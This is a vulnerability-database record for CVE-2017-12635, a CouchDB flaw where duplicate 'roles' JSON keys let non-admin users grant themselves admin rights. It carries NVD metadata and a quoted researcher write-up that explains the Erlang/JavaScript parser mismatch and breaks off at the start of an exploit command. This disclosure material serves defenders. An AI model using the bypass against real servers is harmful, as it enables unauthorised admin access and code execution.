ID CVE-2017-12635 Type cve Reporter NVD Modified 2018-07-27T21:29:02
Description
Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.
{"id": "CVE-2017-12635", "bulletinFamily": "NVD", "title": "CVE-2017-12635", "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "published": "2017-11-14T15:29:00", "modified": "2018-07-27T21:29:02", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "reporter": "NVD", "references": ["https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html", "http://www.securityfocus.com/bid/101868", "https://security.gentoo.org/glsa/201711-16", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E", "https://www.exploit-db.com/exploits/44498/", "https://www.exploit-db.com/exploits/45019/"], "cvelist": ["CVE-2017-12635"], "type": "cve", "lastseen": "2018-09-13T20:06:58", "history": [{"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": [], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 2, "enchantments": {}, "hash": "0df62293dff1a54ac462a5dec6769bd7e01fee55cc444389a167b407e8f62b01", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "2de41ca7197a9bfe8795627c04faa827", "key": "references"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d368de4b3c0b12df124db5da0e74e029", "key": "modified"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2017-11-19T11:28:37", "modified": "2017-11-18T21:29:01", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["http://www.securityfocus.com/bid/101868", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 2, "lastseen": "2017-11-19T11:28:37"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:apache:couchdb:1.0.2", "cpe:/a:apache:couchdb:1.0.4", "cpe:/a:apache:couchdb:1.1.1", "cpe:/a:apache:couchdb:1.5.0", "cpe:/a:apache:couchdb:1.0.0", "cpe:/a:apache:couchdb:1.1.0", "cpe:/a:apache:couchdb:1.2.0", "cpe:/a:apache:couchdb:2.0.0:rc3", "cpe:/a:apache:couchdb:2.0.0", "cpe:/a:apache:couchdb:1.0.1", "cpe:/a:apache:couchdb:1.2.1", "cpe:/a:apache:couchdb:1.0.3", "cpe:/a:apache:couchdb:2.0.0:rc1", "cpe:/a:apache:couchdb:2.0.0:rc4", "cpe:/a:apache:couchdb:1.1.2", "cpe:/a:apache:couchdb:2.0.0:rc2"], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 4, "enchantments": {"score": {"modified": "2017-12-05T11:42:24", "value": 6.0}}, "hash": "c6a7ad5cd66e42537612a56bcbabfc3116b39f5199cfe440b1fed1ae74c1a29c", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "632b5083db2f267df9ed4db10a83a3e1", "key": "modified"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "cde791b37b1395d080e285ac7b252e2b", "key": "references"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "c1fdfda05f1ab65c144b9fd5e52aebc6", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2017-12-05T11:42:24", "modified": "2017-12-04T13:29:52", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["http://www.securityfocus.com/bid/101868", "https://security.gentoo.org/glsa/201711-16", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 4}, "differentElements": ["references", "modified"], "edition": 4, "lastseen": "2017-12-05T11:42:24"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:apache:couchdb:1.0.2", "cpe:/a:apache:couchdb:1.0.4", "cpe:/a:apache:couchdb:1.1.1", "cpe:/a:apache:couchdb:1.5.0", "cpe:/a:apache:couchdb:1.0.0", "cpe:/a:apache:couchdb:1.1.0", "cpe:/a:apache:couchdb:1.2.0", "cpe:/a:apache:couchdb:2.0.0:rc3", "cpe:/a:apache:couchdb:2.0.0", "cpe:/a:apache:couchdb:1.0.1", "cpe:/a:apache:couchdb:1.2.1", "cpe:/a:apache:couchdb:1.0.3", "cpe:/a:apache:couchdb:2.0.0:rc1", "cpe:/a:apache:couchdb:2.0.0:rc4", "cpe:/a:apache:couchdb:1.1.2", "cpe:/a:apache:couchdb:2.0.0:rc2"], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "5c2312309d049096e9de5c841bf437d5d4a664c60143bfdbd34974bde7e06446", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "c1fdfda05f1ab65c144b9fd5e52aebc6", "key": "cpe"}, {"hash": "0d13051d3579ee3d2d855c7e163828a4", "key": "references"}, {"hash": "4e57e5e638e40521a5d47d45b1d16113", "key": "modified"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2018-02-05T15:16:13", "modified": "2018-02-03T21:29:08", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html", "http://www.securityfocus.com/bid/101868", "https://security.gentoo.org/glsa/201711-16", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 16}, "differentElements": ["references", "modified"], "edition": 5, "lastseen": "2018-02-05T15:16:13"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:apache:couchdb:1.0.2", "cpe:/a:apache:couchdb:1.0.4", "cpe:/a:apache:couchdb:1.1.1", "cpe:/a:apache:couchdb:1.5.0", "cpe:/a:apache:couchdb:1.0.0", "cpe:/a:apache:couchdb:1.1.0", "cpe:/a:apache:couchdb:1.2.0", "cpe:/a:apache:couchdb:2.0.0:rc3", "cpe:/a:apache:couchdb:2.0.0", "cpe:/a:apache:couchdb:1.0.1", "cpe:/a:apache:couchdb:1.2.1", "cpe:/a:apache:couchdb:1.0.3", "cpe:/a:apache:couchdb:2.0.0:rc1", "cpe:/a:apache:couchdb:2.0.0:rc4", "cpe:/a:apache:couchdb:1.1.2", "cpe:/a:apache:couchdb:2.0.0:rc2"], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 7, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "673fd173b0a9d971b651a6f8fe8fc31219fe13fcd9690b3e79c389e54d5147ef", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "485c0eb769e1ac95d03c6cf80937ac78", "key": "modified"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "11301c4248aee537f442c2d77ee57aab", "key": "references"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "c1fdfda05f1ab65c144b9fd5e52aebc6", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2018-07-30T13:49:29", "modified": "2018-07-27T21:29:02", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html", "http://www.securityfocus.com/bid/101868", "https://security.gentoo.org/glsa/201711-16", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E", "https://www.exploit-db.com/exploits/44498/", "https://www.exploit-db.com/exploits/45019/"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 17}, "differentElements": ["cpe"], "edition": 7, "lastseen": "2018-07-30T13:49:29"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": ["cpe:/a:apache:couchdb:1.0.2", "cpe:/a:apache:couchdb:1.0.4", "cpe:/a:apache:couchdb:1.1.1", "cpe:/a:apache:couchdb:1.5.0", "cpe:/a:apache:couchdb:1.0.0", "cpe:/a:apache:couchdb:1.1.0", "cpe:/a:apache:couchdb:1.2.0", "cpe:/a:apache:couchdb:2.0.0:rc3", "cpe:/a:apache:couchdb:2.0.0", "cpe:/a:apache:couchdb:1.0.1", "cpe:/a:apache:couchdb:1.2.1", "cpe:/a:apache:couchdb:1.0.3", "cpe:/a:apache:couchdb:2.0.0:rc1", "cpe:/a:apache:couchdb:2.0.0:rc4", "cpe:/a:apache:couchdb:1.1.2", "cpe:/a:apache:couchdb:2.0.0:rc2"], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "04e599e684be9dcc8d7c8cb95e73696ab4fd13482655f40481879987e8cb1099", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "bc1c9560b1d4d69a3d23163810804945", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "19888d1ac5423e2f60fbdfc1e741eae7", "key": "references"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "c1fdfda05f1ab65c144b9fd5e52aebc6", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2018-04-27T07:02:19", "modified": "2018-04-25T21:29:00", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["https://lists.debian.org/debian-lts-announce/2018/01/msg00026.html", "http://www.securityfocus.com/bid/101868", "https://security.gentoo.org/glsa/201711-16", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E", "https://www.exploit-db.com/exploits/44498/"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 17}, "differentElements": ["references", "modified"], "edition": 6, "lastseen": "2018-04-27T07:02:19"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": [], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 3, "enchantments": {}, "hash": "7d73d996f17175eeb7b7f6749cf1210d4f21a9423c5a27daeab2a9ba62d5f2c5", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "cde791b37b1395d080e285ac7b252e2b", "key": "references"}, {"hash": "c726a647061bbdce7615436514ccf00b", "key": "modified"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2017-11-25T11:37:51", "modified": "2017-11-20T21:29:08", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["http://www.securityfocus.com/bid/101868", "https://security.gentoo.org/glsa/201711-16", "https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 1}, "differentElements": ["cvss", "modified", "cpe"], "edition": 3, "lastseen": "2017-11-25T11:37:51"}, {"bulletin": {"assessment": {"href": "", "name": "", "system": ""}, "bulletinFamily": "NVD", "cpe": [], "cvelist": ["CVE-2017-12635"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Due to differences in the Erlang-based JSON parser and JavaScript-based JSON parser, it is possible in Apache CouchDB before 1.7.0 and 2.x before 2.1.1 to submit _users documents with duplicate keys for 'roles' used for access control within the database, including the special case '_admin' role, that denotes administrative users. In combination with CVE-2017-12636 (Remote Code Execution), this can be used to give non-admin users access to arbitrary shell commands on the server as the database system user. The JSON parser differences result in behaviour that if two 'roles' keys are available in the JSON, the second one will be used for authorising the document write, but the first 'roles' key is used for subsequent authorization for the newly created user. By design, users can not assign themselves roles. The vulnerability allows non-admin users to give themselves admin privileges.", "edition": 1, "enchantments": {}, "hash": "7dc0481bed65052f933ab7b602dca37a5448f2ff80eb9fca55e8a1c163e4ea3e", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "scanner"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "reporter"}, {"hash": "5299b2a5d7f6c42a8fbb0baa416e3196", "key": "title"}, {"hash": "6d3f4796275bb54c21a33b82f399cc6d", "key": "assessment"}, {"hash": "f672a965c873eb75ba2b804d51dbaff6", "key": "href"}, {"hash": "44059845d2ea55e69d7ed533f53e42c5", "key": "description"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "published"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "c1a507bac089dfbb5d2922ab28d71a65", "key": "modified"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "0c2d66c645033e5e08134fa9a93424ec", "key": "references"}, {"hash": "e3981b7fa9fc3eff3e0302c01888728c", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-12635", "id": "CVE-2017-12635", "lastseen": "2017-11-15T11:56:44", "modified": "2017-11-14T15:29:00", "objectVersion": "1.3", "published": "2017-11-14T15:29:00", "references": ["https://lists.apache.org/thread.html/6c405bf3f8358e6314076be9f48c89a2e0ddf00539906291ebdf0c67@%3Cdev.couchdb.apache.org%3E"], "reporter": "NVD", "scanner": [], "title": "CVE-2017-12635", "type": "cve", "viewCount": 0}, "differentElements": ["references", "modified"], "edition": 1, "lastseen": "2017-11-15T11:56:44"}], "edition": 8, "hashmap": [{"key": "assessment", "hash": "6d3f4796275bb54c21a33b82f399cc6d"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "2420f2c22e20ed313cfaa80b3c4b839f"}, {"key": "cvelist", "hash": "e3981b7fa9fc3eff3e0302c01888728c"}, {"key": "cvss", "hash": "2bdabeb49c44761f9565717ab0e38165"}, {"key": "description", "hash": "44059845d2ea55e69d7ed533f53e42c5"}, {"key": "href", "hash": "f672a965c873eb75ba2b804d51dbaff6"}, {"key": "modified", "hash": "485c0eb769e1ac95d03c6cf80937ac78"}, {"key": "published", "hash": "c1a507bac089dfbb5d2922ab28d71a65"}, {"key": "references", "hash": "11301c4248aee537f442c2d77ee57aab"}, {"key": "reporter", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "scanner", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "title", "hash": "5299b2a5d7f6c42a8fbb0baa416e3196"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "bf1f258460c998e1f53ee13b0cb9d46a1b7b4b5d0d9e34f02cb6021ece636371", "viewCount": 20, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.3", "cpe": ["cpe:/a:apache:couchdb:0.9.1", "cpe:/a:apache:couchdb:1.0.2", "cpe:/a:apache:couchdb:1.3.1", "cpe:/a:apache:couchdb:1.0.4", "cpe:/a:apache:couchdb:0.11.0", "cpe:/a:apache:couchdb:1.6.1", "cpe:/a:apache:couchdb:1.3.0", "cpe:/a:apache:couchdb:1.1.1", "cpe:/a:apache:couchdb:1.5.0", "cpe:/a:apache:couchdb:1.0.0", "cpe:/a:apache:couchdb:0.9.0", "cpe:/a:apache:couchdb:1.1.0", "cpe:/a:apache:couchdb:0.10.1", "cpe:/a:apache:couchdb:0.10.0", "cpe:/a:apache:couchdb:1.2.0", "cpe:/a:apache:couchdb:2.0.0:rc3", "cpe:/a:apache:couchdb:2.0.0", "cpe:/a:apache:couchdb:0.8.1", "cpe:/a:apache:couchdb:1.0.1", "cpe:/a:apache:couchdb:0.9.2", "cpe:/a:apache:couchdb:0.8.0", "cpe:/a:apache:couchdb:1.2.2", "cpe:/a:apache:couchdb:1.4.0", "cpe:/a:apache:couchdb:0.11.2", "cpe:/a:apache:couchdb:0.10.2", "cpe:/a:apache:couchdb:1.2.1", "cpe:/a:apache:couchdb:0.11.1", "cpe:/a:apache:couchdb:1.0.3", "cpe:/a:apache:couchdb:2.0.0:rc1", "cpe:/a:apache:couchdb:2.0.0:rc4", "cpe:/a:apache:couchdb:1.5.1", "cpe:/a:apache:couchdb:1.6.0", "cpe:/a:apache:couchdb:1.1.2", "cpe:/a:apache:couchdb:2.0.0:rc2"], "assessment": {"href": "", "name": "", "system": ""}, "scanner": []}
{"seebug": [{"lastseen": "2017-11-19T11:56:26", "_object_types": ["robots.models.base.Bulletin", "robots.models.seebug.SeebugBulletin"], "references": [], "enchantments_done": [], "description": "There was a vulnerability in CouchDB caused by a discrepancy between the database\u2019s native JSON parser and the Javascript JSON parser used during document validation. Because CouchDB databases are meant to be exposed directly to the internet, this enabled privilege escalation, and ultimately remote code execution, on a large number of installations. I\u2019m wrong, and the main npm registry is unaffected. See correction below. My bad!] [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635)\r\n\r\n### Background\r\nLast time, I wrote about a deserialization bug leading to [code execution on rubygems.org](https://justi.cz/security/2017/10/07/rubygems-org-rce.html), a repository of dependencies for ruby programs. The ability to inject malware into upstream project dependencies is a scary attack vector, and one from which I doubt most organizations are adequately protected.\r\n\r\nWith this in mind, I started searching for bugs in [registry.npmjs.org](https://registry.npmjs.org/), the server responsible for distributing npm packages. According to [their homepage](https://www.npmjs.com/), the npm registry serves more than 3 billion (!) package downloads per week.\r\n\r\n### CouchDB\r\nThe npm registry uses CouchDB, which I hadn\u2019t heard of before this project. The basic idea is that it\u2019s a \u201cNoSQL\u201d database that makes data replication very easy. It\u2019s sort of like a big key-value store for JSON blobs (\u201cdocuments\u201d), with features for data validation, querying, and user authentication, making it closer to a full-fledged database. CouchDB is written in Erlang, but allows users to specify document validation scripts in Javascript. These scripts are automatically evaluated when a document is created or updated. They start in a new process, and are passed JSON-serialized documents from the Erlang side.\r\n\r\nCouchDB manages user accounts through a special database called `_users`. When you create or modify a user in a CouchDB database (usually by doing a `PUT` to `/_users/org.couchdb.user:your_username`), the server checks your proposed change with a Javascript `validate_doc_update` function to ensure that you\u2019re not, for example, attempting to make yourself an administrator.\r\n\r\n### Vulnerability\r\nThe problem is that there is a discrepancy between the Javascript JSON parser (used in validation scripts) and the one used internally by CouchDB, called [jiffy](https://github.com/apache/couchdb-jiffy). Check out how each one deals with duplicate keys on an object like `{\"foo\":\"bar\", \"foo\":\"baz\"}`:\r\n\r\nErlang:\r\n```\r\n> jiffy:decode(\"{\\\"foo\\\":\\\"bar\\\", \\\"foo\\\":\\\"baz\\\"}\"). \r\n{[{<<\"foo\">>,<<\"bar\">>},{<<\"foo\">>,<<\"baz\">>}]}\r\n```\r\n\r\nJavascript:\r\n```\r\n> JSON.parse(\"{\\\"foo\\\":\\\"bar\\\", \\\"foo\\\": \\\"baz\\\"}\")\r\n{foo: \"baz\"}\r\n```\r\n\r\nFor a given key, the Erlang parser will store both values, but the Javascript parser will only store the last one. Unfortunately, the getter function for CouchDB\u2019s internal representation of the data will only return the first value:\r\n```\r\n% Within couch_util:get_value \r\nlists:keysearch(Key, 1, List).\r\n```\r\n\r\nAnd so, we can bypass all of the relevant input validation and create an admin user thusly:\r\n```\r\ncurl -X PUT 